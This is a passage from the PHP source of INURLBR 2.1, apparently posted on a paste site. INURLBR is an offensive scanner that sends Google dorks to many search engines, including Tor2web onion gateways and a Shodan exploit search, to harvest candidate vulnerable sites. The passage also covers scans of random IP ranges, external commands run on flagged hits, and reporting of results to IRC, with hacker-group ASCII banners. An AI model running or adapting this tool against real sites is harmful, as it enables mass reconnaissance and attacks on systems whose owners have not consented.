  3393. __pageEngine($confArray, "DMOZ", "http://www.dmoz.org/search/search?q=[DORK]&start=[PAG]&type=next&all=yes&cat=", $dork_, $postDados, 0, 800, 20);
  3394. }
  3395.  
  3396. ################################################################################
  3397. # SEARCH ENGINE ::: gigablast
  3398. ################################################################################
  3399.  
  3400. if (__validateOptions($_SESSION["config"]["motor"], 12) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3401.  
  3402. __pageEngine($confArray, "GIGABLAST", "http://www.gigablast.com/search?k3h=223119&s=22&rat=0&sc=1&ns=100&n=100&sites=&q=[DORK]", $dork_, $postDados, 0, 1, 1);
  3403. }
  3404.  
  3405. ################################################################################
  3406. # SEARCH ENGINE ::: web.search.naver.com
  3407. ################################################################################
  3408.  
  3409. if (__validateOptions($_SESSION["config"]["motor"], 13) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3410.  
  3411. __pageEngine($confArray, "NEVER", "http://web.search.naver.com/search.naver?where=webkr&query=[DORK]&xc=&docid=0&qt=df&lang=all&f=&r=&st=s&fd=2&start=[PAG]", $dork_, $postDados, 1, 500, 10);
  3412. }
  3413.  
  3414. ################################################################################
  3415. # SEARCH ENGINE ::: br.baidu.com
  3416. ################################################################################
  3417.  
  3418. if (__validateOptions($_SESSION["config"]["motor"], 14) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3419.  
  3420. __pageEngine($confArray, "BAIDU BR", "http://www.baidu.com.br/s?usm=1&rn=100&wd=[DORK]&ie=utf-8&pn=[PAG]&showTop=0", $dork_, $postDados, 0, 1500, 100);
  3421. }
  3422.  
  3423. ################################################################################
  3424. # SEARCH ENGINE ::: www.yandex.ru
  3425. ################################################################################
  3426.  
  3427. if (__validateOptions($_SESSION["config"]["motor"], 15) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3428.  
  3429. __pageEngine($confArray, "YANDEX", "http://yandex.ru/yandsearch?text=[DORK]&p=[PAG]&lr=10136", $dork_, $postDados, 0, 30, 1);
  3430. }
  3431.  
  3432. ################################################################################
  3433. # SEARCH ENGINE ::: www.zoo.com
  3434. ################################################################################
  3435.  
  3436. if (__validateOptions($_SESSION["config"]["motor"], 16) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3437.  
  3438. __pageEngine($confArray, "ZOO", "http://www.zoo.com/Zoo-Site/search/web?qsi=[PAG2]&q=[DORK]&p=[PAG]&fcoid=4&fpid=2", $dork_, $postDados, 1, 211, 20, 10);
  3439. }
  3440.  
  3441. ################################################################################
  3442. # SEARCH ENGINE ::: www.hotbot.com
  3443. ################################################################################
  3444.  
  3445. if (__validateOptions($_SESSION["config"]["motor"], 17) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3446. $_ = __request_info("http://www.hotbot.com/", $_SESSION["config"]["proxy"], $postDados);
  3447. $_SESSION["config"]["idPesquisaLycos"] = __getIdSearchLycos($_["corpo"]);
  3448. __pageEngine($confArray, "HOTBOT", "http://www.hotbot.com/search/web?pn=[PAG]web?q=[DORK]&keyvol={$_SESSION["config"]["idPesquisaLycos"]}", $dork_, $postDados, 0, 24, 1);
  3449. }
  3450.  
  3451. ################################################################################
  3452. # SEARCH ENGINE ::: www.zhongsou.com
  3453. ################################################################################
  3454.  
  3455. if (__validateOptions($_SESSION["config"]["motor"], 18) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3456.  
  3457. __pageEngine($confArray, "ZHONGSOU", "http://www.zhongsou.com/third?w=[DORK]&b=[PAG]", $dork_, $postDados, 1, 50, 1);
  3458. }
  3459.  
  3460. ################################################################################
  3461. # SEARCH ENGINE ::: hksearch.timway.com
  3462. ################################################################################
  3463. if (__validateOptions($_SESSION["config"]["motor"], 19) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3464.  
  3465. __pageEngine($confArray, "HKSEARCH", "http://hksearch.timway.com/search.php?query=[DORK]&region=zh-hant-hk&p=[PAG]", $dork_, $postDados, 1, 12, 1);
  3466. }
  3467.  
  3468. ################################################################################
  3469. # SEARCH ENGINE ::: find.ezilon.com / USA
  3470. ################################################################################
  3471.  
  3472. if (__validateOptions($_SESSION["config"]["motor"], 20) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3473.  
  3474. __pageEngine($confArray, "EZILION USA", "http://find.ezilon.com/search.php?q=[DORK]&start=[PAG]&t=&v=usa&f=", $dork_, $postDados, 0, 215, 15);
  3475. }
  3476.  
  3477. ################################################################################
  3478. # SEARCH ENGINE ::: find.ezilon.com / ASIA
  3479. ################################################################################
  3480.  
  3481. if (__validateOptions($_SESSION["config"]["motor"], 20) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3482.  
  3483. __pageEngine($confArray, "EZILION ASIA", "http://find.ezilon.com/search.php?q=[DORK]&start=[PAG]&t=&v=asia&f=", $dork_, $postDados, 0, 215, 15);
  3484. }
  3485.  
  3486. ################################################################################
  3487. # SEARCH ENGINE ::: find.ezilon.com / EUROPA
  3488. ################################################################################
  3489.  
  3490. if (__validateOptions($_SESSION["config"]["motor"], 20) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3491.  
  3492. __pageEngine($confArray, "EZILION EUROPA", "http://find.ezilon.com/search.php?q=[DORK]&start=[PAG]&t=&v=eu&f=", $dork_, $postDados, 0, 215, 15);
  3493. }
  3494.  
  3495. ################################################################################
  3496. # SEARCH ENGINE ::: find.ezilon.com / INDIA
  3497. ################################################################################
  3498. if (__validateOptions($_SESSION["config"]["motor"], 20) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3499.  
  3500. __pageEngine($confArray, "EZILION INDIA", "http://find.ezilon.com/search.php?q=[DORK]&start=[PAG]&t=&v=in&f=", $dork_, $postDados, 0, 215, 15);
  3501. }
  3502.  
  3503. ################################################################################
  3504. # SEARCH ENGINE ::: www.sogou.com
  3505. ################################################################################
  3506.  
  3507. if (__validateOptions($_SESSION["config"]["motor"], 21) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3508.  
  3509. __pageEngine($confArray, "SOGOU", "http://www.sogou.com/web?query=[DORK]&page=[pag]&ie=utf8", $dork_, $postDados, 1, 20, 1);
  3510. }
  3511.  
  3512. ################################################################################
  3513. # SEARCH ENGINE ::: api.duckduckgo.com
  3514. ################################################################################
  3515.  
  3516. if (__validateOptions($_SESSION["config"]["motor"], 22) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3517.  
  3518. $postDados = TRUE;
  3519. __pageEngine($confArray, "DUCK DUCK GO", "https://api.duckduckgo.com/html/?q=[DORK]&kl=en-us&p=-1&s=[PAG]&dc=[PAG3]&o=json&api=d.js", $dork_, $postDados, 0, 800, 50, 0, 37);
  3520. }
  3521.  
  3522. ################################################################################
  3523. # SEARCH ENGINE ::: boorow
  3524. ################################################################################
  3525.  
  3526. if (__validateOptions($_SESSION["config"]["motor"], 23) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3527.  
  3528. $postDados = TRUE;
  3529. __pageEngine($confArray, "BOOROW", "http://boorow.com/Pages/site_br_aspx?query=[DORK]", $dork_, $postDados, 0, 0, 1);
  3530. }
  3531.  
  3532. ################################################################################
  3533. # SEARCH ENGINE ::: Google Generic RANDOM
  3534. ################################################################################
  3535.  
  3536. if (__validateOptions($_SESSION["config"]["motor"], 24) || __validateOptions($_SESSION["config"]["motor"], 1) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3537.  
  3538. $randHost = __dominioGoogleRandom();
  3539. $randGeneric = __googleGenericRandom();
  3540. __pageEngine($confArray, "GOOGLE_GENERIC_RANDOM - {$randHost} ID: {$randGeneric}", "http://{$randHost}/cse?cx={$randGeneric}&q=[DORK]&num=500&hl=en&as_qdr=all&start=[PAG]&sa=N", $dork_, $postDados, 0, 5, 1);
  3541. }
  3542.  
  3543.  
  3544. #===============================================================================
  3545. #===============================================================================
  3546. #===============================================================================
  3547. #======================[ MOTORES DE BUSCA ESPECIAIS ]==========================
  3548. #===============================================================================
  3549. #===============================================================================
  3550. #===============================================================================
  3551. #===============================================================================
  3552. # SEARCH ENGINE ::: ndj6p3asftxboa7j.tor2web.org / Tor find ===================
  3553. #===============================================================================
  3554.  
  3555. if (__validateOptions($_SESSION["config"]["motor"], "e1")) {
  3556.  
  3557. __pageEngine("TOR FIND", "https://ndj6p3asftxboa7j.tor2web.org/search.php?search_query=[DORK]&page_num=[PAG]&domainchoice=onion", $dork_, $postDados, 1, 5, 1);
  3558. }
  3559.  
  3560. #===============================================================================
  3561. # SEARCH ENGINE ::: elephantjmjqepsw.tor2web.org ==============================
  3562. #===============================================================================
  3563.  
  3564. if (__validateOptions($_SESSION["config"]["motor"], "e2")) {
  3565.  
  3566. __pageEngine("ELEPHANT", "https://elephantjmjqepsw.tor2web.orgsearch?q=[DORK]&page=[PAG]", $dork_, $postDados, 0, 29, 1);
  3567. }
  3568.  
  3569. #===============================================================================
  3570. # SEARCH ENGINE ::: kbhpodhnfxl3clb4.tor2web.org ==============================
  3571. #===============================================================================
  3572.  
  3573. if (__validateOptions($_SESSION["config"]["motor"], "e3")) {
  3574.  
  3575. __pageEngine("TORSEARCH", "https://kbhpodhnfxl3clb4.tor2web.org/en/search?j=f&page=[PAG]&q=[DORK]&utf8=%E2%9C%93", $dork_, $postDados, 0, 10, 1);
  3576. }
  3577.  
  3578. #===============================================================================
  3579. # SEARCH ENGINE ::: search.wikileaks.org ======================================
  3580. #===============================================================================
  3581.  
  3582. if (__validateOptions($_SESSION["config"]["motor"], "e4")) {
  3583.  
  3584. __pageEngine("WIKILEAKS", "https://search.wikileaks.org/?page=[PAG]&q=[DORK]&sort=0#results", $dork_, $postDados, 1, 60, 1);
  3585. }
  3586.  
  3587. #===============================================================================
  3588. # SEARCH ENGINE ::: oth.net ====================================================
  3589. #===============================================================================
  3590.  
  3591. if (__validateOptions($_SESSION["config"]["motor"], "e5")) {
  3592.  
  3593. __pageEngine("OTN", "http://oth.net/s/s?q=[DORK]&cl=1&skip=[PAG]", $dork_, $postDados, 1, 211, 20);
  3594. }
  3595.  
  3596. #===============================================================================
  3597. # SEARCH ENGINE ::: exploits.shodan.io =========================================
  3598. #===============================================================================
  3599.  
  3600. if (__validateOptions($_SESSION["config"]["motor"], "e6")) {
  3601.  
  3602. __pageEngine("EXPLOITS SHODAN", "https://exploits.shodan.io/?q=[DORK]&p=[PAG]", $dork_, $postDados, 1, 25, 1);
  3603. }
  3604.  
  3605. __plus();
  3606. }
  3607.  
  3608. ################################################################################
  3609. #INITIAL INFORMATION############################################################
  3610. ################################################################################
  3611.  
  3612. function __startingBanner() {
  3613.  
  3614. echo "\n{$_SESSION["c1"]}[ ! ] Starting SCANNER INURLBR 2.1 at [" . date("d-m-Y H:i:s") . "]{$_SESSION["c9"]}
  3615. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  3616. It is the end user's responsibility to obey all applicable local, state and federal laws.
  3617. Developers assume no liability and are not responsible for any misuse or damage caused by this program{$_SESSION["c0"]}\n";
  3618.  
  3619. $file = not_isnull_empty($_SESSION['config']['arquivo_output']) ? $_SESSION['config']['arquivo_output'] : NULL;
  3620. $file_all = not_isnull_empty($_SESSION['config']['arquivo_output_all']) ? $_SESSION['config']['arquivo_output_all'] : NULL;
  3621. $command = not_isnull_empty($_SESSION['config']['command-vul']) ? $_SESSION['config']['command-vul'] : $_SESSION['config']['command-all'];
  3622. $subcommand = not_isnull_empty($_SESSION['config']['sub-cmd-vul']) ? $_SESSION['config']['sub-cmd-vul'] : $_SESSION['config']['sub-cmd-all'];
  3623.  
  3624. echo (not_isnull_empty($_SESSION['config']['ifemail']) ?
  3625. "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ FILTER EMAIL ]::{$_SESSION["c1"]}[ {$_SESSION['config']['ifemail']} ]{$_SESSION["c0"]}" : NULL);
  3626.  
  3627. echo (is_array($_SESSION['config']['dork-file']) ?
  3628. "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ DORK FILE ]::{$_SESSION["c1"]}[ {$_SESSION['config']['dork-file']} ]{$_SESSION["c0"]}" : NULL);
  3629.  
  3630. echo (not_isnull_empty($_SESSION['config']['dork-rand']) ?
  3631. "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ DORKS GENERATED ]::{$_SESSION["c1"]}[ {$_SESSION['config']['dork-rand']} ]{$_SESSION["c0"]}" : NULL);
  3632.  
  3633. echo (is_array($_SESSION['config']['irc']['conf']) ?
  3634. "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ SEND VULN IRC ]::{$_SESSION["c1"]}[ server: {$_SESSION['config']['irc']['conf'][0]} / channel: {$_SESSION['config']['irc']['conf'][1]} ]{$_SESSION["c0"]}" : NULL);
  3635.  
  3636. echo (not_isnull_empty($_SESSION['config']['ifurl']) ?
  3637. "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ FILTER URL ]::{$_SESSION["c1"]}[ {$_SESSION['config']['ifurl']} ]{$_SESSION["c0"]}" : NULL);
  3638.  
  3639. echo (not_isnull_empty($file) ?
  3640. "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ OUTPUT FILE ]::{$_SESSION["c1"]} [ " . getcwd() . "/{$_SESSION['config']['out_put_paste']}{$file} ]{$_SESSION["c0"]}" : NULL);
  3641.  
  3642. echo (not_isnull_empty($file_all) ?
  3643. "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ OUTPUT FILE ALL ]::{$_SESSION["c1"]}[ " . getcwd() . "/{$_SESSION['config']['out_put_paste']}{$file_all} ]{$_SESSION["c0"]}" : NULL);
  3644.  
  3645. echo (not_isnull_empty($command) ?
  3646. "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ DEFINED EXTERNAL COMMAND ]::{$_SESSION["c1"]} [ $command ]{$_SESSION["c0"]}" : NULL);
  3647.  
  3648. echo (not_isnull_empty($subcommand) ?
  3649. "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ DEFINED EXTERNAL SUB_COMMAND ]::{$_SESSION["c1"]} [ $subcommand ]{$_SESSION["c0"]}" : NULL);
  3650.  
  3651. echo (not_isnull_empty($_SESSION['config']['proxy-file']) ?
  3652. "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c16"]}[ FILE SOURCE LIST OF PROXY ]::{$_SESSION["c1"]} [ {$_SESSION['config']['proxy-file']} ]{$_SESSION["c0"]}" : NULL);
  3653. }
  3654.  
  3655. ################################################################################
  3656. #RUN WITH SEARCH ENGINES########################################################
  3657. ################################################################################
  3658. # (PHP 4 >= 4.0.1, PHP 5) create_function — Create an anonymous (lambda-style)
  3659. # function http://php.net/manual/en/function.create-function.php
  3660.  
  3661. function __main($dork, $motor, $cod) {
  3662.  
  3663. $dork_[0] = (strstr($dork, '[DORK]') ? explode('[DORK]', $dork) : array($dork));
  3664. $dork_[1] = (not_isnull_empty($_SESSION['config']['dork-file']) ? __openFile($_SESSION['config']['dork-file'], 1) : $dork_[0]);
  3665. $dork_[2] = (not_isnull_empty($_SESSION['config']['dork-rand']) ? __randomDork($_SESSION['config']['dork-rand']) : array());
  3666. $dork_[3] = array_filter(array_unique(array_merge($dork_[0], $dork_[1], $dork_[2])));
  3667.  
  3668. $file_proxy = (not_isnull_empty($_SESSION['config']['proxy-file']) ? __openFile($_SESSION['config']['proxy-file'], 1) : NULL);
  3669. $list_proxy = (is_array($file_proxy) ? ($file_proxy) : NULL);
  3670.  
  3671. print __bannerLogo();
  3672.  
  3673. __startingBanner();
  3674.  
  3675. for ($i = 0; $i <= count($dork_[3]); $i++) {
  3676.  
  3677. if (!empty($dork_[3][$i])) {
  3678.  
  3679. echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ DORK ]::{$_SESSION["c1"]}[ {$dork_[3][$i]} ]\n";
  3680.  
  3681. //$objNewSearch = create_function('$dork_, $motor, $list_proxy', $cod);
  3682. //$objNewSearch(urlencode($dork_[3][$i]), $motor, $list_proxy);
  3683.  
  3684. __engines(urlencode($dork_[3][$i]), $list_proxy) . __plus();
  3685.  
  3686. ($_SESSION["config"]["pr"]) ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL;
  3687. ($_SESSION["config"]["pr"]) ? $_SESSION["config"]["totas_urls"] = NULL : NULL;
  3688.  
  3689. echo "\n";
  3690. }
  3691. }
  3692.  
  3693. (!$_SESSION["config"]["pr"]) ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL;
  3694.  
  3695. __exitProcess();
  3696. }
  3697.  
  3698. ################################################################################
  3699. #RUN VALIDATION / PROCESSES SCAN RANG IP########################################
  3700. ################################################################################
  3701.  
  3702. if (not_isnull_empty($_SESSION['config']['range']) || not_isnull_empty($_SESSION['config']['range-rand'])) {
  3703.  
  3704. print __bannerLogo();
  3705. __startingBanner();
  3706. not_isnull_empty($_SESSION['config']['range']) ? __process(__generatorRangeIP($_SESSION['config']['range'])) : NULL;
  3707. not_isnull_empty($_SESSION['config']['range-rand']) ? __process(__generatorIPRandom(array(1 => $_SESSION['config']['range-rand']))) : NULL;
  3708. __exitProcess();
  3709. }
  3710.  
  3711.  
  3712. ################################################################################
  3713. #RUN VALIDATION / PROCESSES WITH FILE###########################################
  3714. ################################################################################
  3715.  
  3716. if (not_isnull_empty($_SESSION['config']['abrir-arquivo'])) {
  3717.  
  3718. print __bannerLogo();
  3719. __startingBanner();
  3720. __openFile($_SESSION['config']['abrir-arquivo']);
  3721. __plus();
  3722. __exitProcess();
  3723. }
  3724.  
  3725. ################################################################################
  3726. #RUN WITH SEARCH ENGINES########################################################
  3727. ################################################################################
  3728.  
  3729. __main($_SESSION['config']['dork'], $_SESSION['config']['motor'], $_SESSION['config']['cod']);
  3730.  
  3731. function __extra() {
  3732.  
  3733. $banners = array(
  3734. "{$_SESSION["c1"]}
  3735. _ _ _ _ _ ____ _ ___ ____
  3736. | |\ | | | |__/ | |__] |__/
  3737. | | \| |__| | \ |___ |__] | \
  3738. ", "{$_SESSION["c1"]}
  3739. ( ) ( ( (
  3740. )\ ) ( /( )\ ) )\ ) ( )\ )
  3741. (()/( )\()) ( (()/((()/( ( )\ (()/(
  3742. /(_))((_)\ )\ /(_))/(_)))((_) /(_))
  3743. (_)) _((_) _ ((_)(_)) (_)) ((_)_ (_))
  3744. |_ _| | \| || | | || _ \| | | _ )| _ \
  3745. | | | .` || |_| || /| |__ | _ \| /
  3746. |___| |_|\_| \___/ |_|_\|____||___/|_|_\
  3747. ", "{$_SESSION["c1"]}
  3748. .-..-. .-..-. .-..----. .-. .----. .----.
  3749. | || `| || { } || {} }| | | {} }| {} }
  3750. | || |\ || {_} || .-. \| `--.| {} }| .-. \
  3751. `-'`-' `-'`-----'`-' `-'`----'`----' `-' `-'
  3752. ", "{$_SESSION["c1"]}
  3753. ___ _ _ _ _ ____ _ ____ ____
  3754. |_ _| \ | | | | | _ \| | | __ )| _ \
  3755. | || \| | | | | |_) | | | _ \| |_) |
  3756. | || |\ | |_| | _ <| |___| |_) | _ <
  3757. |___|_| \_|\___/|_| \_\_____|____/|_| \_\
  3758. ", "{$_SESSION["c1"]}
  3759. /~\
  3760. |oo ) /INURLBR
  3761. _\=/_
  3762. ___ # / _ \ #
  3763. /() \ \\//|/.\|\\//
  3764. _|_____|_ \/ \_/ \/
  3765. | | === | | |\ /|
  3766. |_| O |_| \_ _/
  3767. || O || | | |
  3768. ||__*__|| | | |
  3769. |~ \___/ ~| []|[]
  3770. /=\ /=\ /=\ | | |
  3771. ________________[_]_[_]_[_]________/_]_[_\_________________________
  3772. ", "{$_SESSION["c1"]}
  3773. ______ __ __ __ __ ____ __ ____ ____
  3774. /\__ _\ /\ \/\ \/\ \/\ \/\ _`\ /\ \ /\ _`\ /\ _`\
  3775. \/_/\ \/ \ \ `\\ \ \ \ \ \ \ \L\ \ \ \ \ \ \L\ \\ \ \L\ \
  3776. \ \ \ \ \ , ` \ \ \ \ \ \ , /\ \ \ __\ \ _ <'\ \ , /
  3777. \_\ \__\ \ \`\ \ \ \_\ \ \ \\ \\ \ \L\ \\ \ \L\ \\ \ \\ \
  3778. /\_____\\ \_\ \_\ \_____\ \_\ \_\ \____/ \ \____/ \ \_\ \_\
  3779. \/_____/ \/_/\/_/\/_____/\/_/\/ /\/___/ \/___/ \/_/\/ /
  3780. ", "{$_SESSION["c1"]}
  3781. _____ ______ _ _ ______ _ ______ ______
  3782. (_____) ___ \| | | (_____ \| | (____ (_____ \
  3783. _ | | | | | | |_____) ) | ____) )____) )
  3784. | | | | | | | | (_____ (| | | __ (_____ (
  3785. _| |_| | | | |___| | | | |_____| |__) ) | |
  3786. (_____)_| |_|\______| |_|_______)______/ |_|
  3787. ", "{$_SESSION["c1"]}
  3788. ______
  3789. .-. .-.
  3790. / \
  3791. | [ INURLBR ] |
  3792. |, .-. .-. ,|
  3793. | )(|_/ \|_)( |
  3794. |/ /\ \|
  3795. _ (_ ^^ _)
  3796. _\ ____) \_______\__|IIIIII|__/_______________________________
  3797. (_)[___]{}<________|-\IIIIII/-|__INURL__INURL__INURL___________\
  3798. / )_/ \ /
  3799. \ ______ /
  3800. ", "{$_SESSION["c1"]}
  3801.  
  3802. 88 88b 88 88 88 88**Yb 88 88**Yb 88**Yb
  3803. 88 88Yb88 88 88 88__dP 88 88__dP 88__dP
  3804. 88 88 Y88 Y8 8P 88*Yb 88 .o 88**Yb 88*Yb
  3805. 88 88 Y8 `YbodP' 88 Yb 88ood8 88oodP 88 Yb
  3806. ", "{$_SESSION["c1"]}
  3807.  
  3808. #
  3809. ## ###
  3810. ### ### ## ### ## ####### ### ####### #######
  3811. ### #### ## ### ## ## ### ## ##
  3812. ### ####### ### ## ###### ### ###### ######
  3813. ### ### ### ### ## ## ## ### ### ## ## ##
  3814. ### ### ## ##### ## ## ####### ###### ## ##
  3815. #
  3816. ", "{$_SESSION["c1"]}
  3817.  
  3818. __ __ __ __ _______ __ __ __ __ __ _______ __
  3819. | | | | | | | | | ____|| | | | | | | | | | | ____|| |
  3820. | |__| | | | | | | |__ | | | |__| | | | | | | |__ | |
  3821. | __ | | | | | | __| | | | __ | | | | | | __| | |
  3822. | | | | | `--' | | |____ |__| | | | | | `--' | | |____ |__|
  3823. |__| |__| \______/ |_______|(__) |__| |__| \______/ |_______|(__)
  3824. ", "{$_SESSION["c1"]}
  3825. _ _
  3826. | |__ _ __ | |__ _ __
  3827. | '_ \| '__| | '_ \| '__|
  3828. | |_) | | | |_) | |
  3829. |_.__/|_| |_.__/|_|
  3830. ", "{$_SESSION["c1"]}
  3831. ___ .__ __. .___________. __ _______ ___
  3832. / \ | \ | | | || | | ____| / \
  3833. / ^ \ | \| | `---| |----`| | | |__ / ^ \
  3834. / /_\ \ | . ` | | | | | | __| / /_\ \
  3835. / _____ \ | |\ | | | | | | | / _____ \
  3836. /__/ \__\ |__| \__| |__| |__| |__| /__/ \__\
  3837. ", "{$_SESSION["c1"]}
  3838. _____ _ _
  3839. / ___| | | (_)
  3840. \ `--. _ _| |____ _____ _ __ ___ ___ _____
  3841. `--. \ | | | '_ \ \ / / _ \ '__/ __| \ \ / / _ \
  3842. /\__/ / |_| | |_) \ V / __/ | \__ \ |\ V / __/
  3843. \____/ \__,_|_.__/ \_/ \___|_| |___/_| \_/ \___|
  3844.  
  3845. ", "{$_SESSION["c1"]}
  3846. __ __ _ _ _ ____ _ _ _ _
  3847. \ \ / /_ _ _ __ __| | __ _| (_)___ _ __ ___ ___ | _ \(_) __ _(_) |_ __ _| |
  3848. \ \ / / _` | '_ \ / _` |/ _` | | / __| '_ ` _ \ / _ \ | | | | |/ _` | | __/ _` | |
  3849. \ V / (_| | | | | (_| | (_| | | \__ \ | | | | | (_) | | |_| | | (_| | | || (_| | |
  3850. \_/ \__,_|_| |_|\__,_|\__,_|_|_|___/_| |_| |_|\___/ |____/|_|\__, |_|\__\__,_|_|
  3851. |___/
  3852. ");
  3853. return ($banners[rand(0, count($banners) - 1)]);
  3854. }
Add Comment
Please, Sign In to add comment